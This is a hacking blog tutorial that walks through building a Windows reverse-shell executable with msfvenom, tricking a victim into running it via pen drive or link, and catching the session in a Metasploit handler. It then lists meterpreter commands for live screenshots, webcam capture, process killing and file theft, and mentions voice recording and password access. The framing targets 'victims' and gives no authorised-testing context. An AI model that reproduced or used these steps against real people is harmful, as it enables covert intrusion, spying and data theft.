How To Hack Any Windows Using Metasploit – Kali Linux Tool
_______________________________________________________
hack windows using Metasploit
How To Hack Any Windows Using Metasploit
You can easily view or delete the targets file, and also can see the victim live using a webcam. So its beneficial for hackers as you can see the view, edit, delete, replace the targets file. You can open applications and give commands to the victim’s computer. so we will see all practically I’ll teach you advanced level windows hacking tricks.
If you are new and don’t know about Linux check out my previous post about WiFi hacking, dos hacking, bug hunting and all other content are available. First of all, install Kali Linux using VMware
Read This Article In the Hindi Language
_____________________________________________________
Hack Windows Using Metasploit Part 1
Windows hacking using Metasploit have two parts; this part is about creating Venom...
- Step 1-: open kali Linux terminals and type this commands.
- · Msfvenom -p windows/meterpreter/reverse_tcp lhost=( Linux IP Address) lport ( Any Open Port) -f exe -a x86 > (setup name.exe)
Example-
· Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.19 lport 4444 -f exe -a x86 > XDAHACS.exe
By typing this command press enter. Now your .exe file is created. You will see this file in home folder
Now you have to do is the file you have created you have to insert in victims PC via pen drive link or zip.
Once you put these files in victims pc and he ran these files . The first part is completed.
____________________________________________________
Hack Windows Using Metasploit Part 2
Part two is about hacking the targets system.
Step 1 -: open kali terminal and type below commands.
- · Msfconsole
This console will take time to open*
- · Use exploit/multi/handler
By this command our handler will be set now we have to set payload that we created at the time of Venom
- · Set payload windows/meterpreter/reverse_tcp
·
- · Set lhost 192.168.0.19 ( Linux ip you gave at the time of creating Venom )
- · Set lport 4444 (port you gave at the time of creating Venom )
- · Exploit
If you are running this file in targets pc you will see like this and if you are not running it you ll see blank.
Step2-: if you want to know about the attacker system which windows version he is using
Type this command-:
- · Sysinfo
Step 3-: if you want to know what victim is doing right now or the screen of victim just type this command you will get live screenshot of victims pc
- · Screenshot
this screen shot will be saved in the root folder.
Step 4-: if a victim is using the laptop then u can see him live by this command
- · Webcam_snap
Step 5 -: you can see his run process by PS command
- · Ps
You ll be able to see all the list of process
If you want to stop some process type this command
- · kill (process id) (the number of ps command that are in left)
Step 6-: if you want to see his desktop simply type
- · ls
And is you want to download any file in targets pc the command is
·
- · Download (file name. type)
Step 7 -: If you want to send the file from your PC to victims PC type this command
- · Upload (file name.type)
If you want to see more command just type Help command you can get a list of commands.
- · Help
Read More - How To Download Netflix Series Free
[favorite] [full-width]
You can record his voice, can see his passwords and if you want to quit the Venom session just type Quit command. If you like the post or having any problem in commands, comment us we will help you. Thank you!
Post a Comment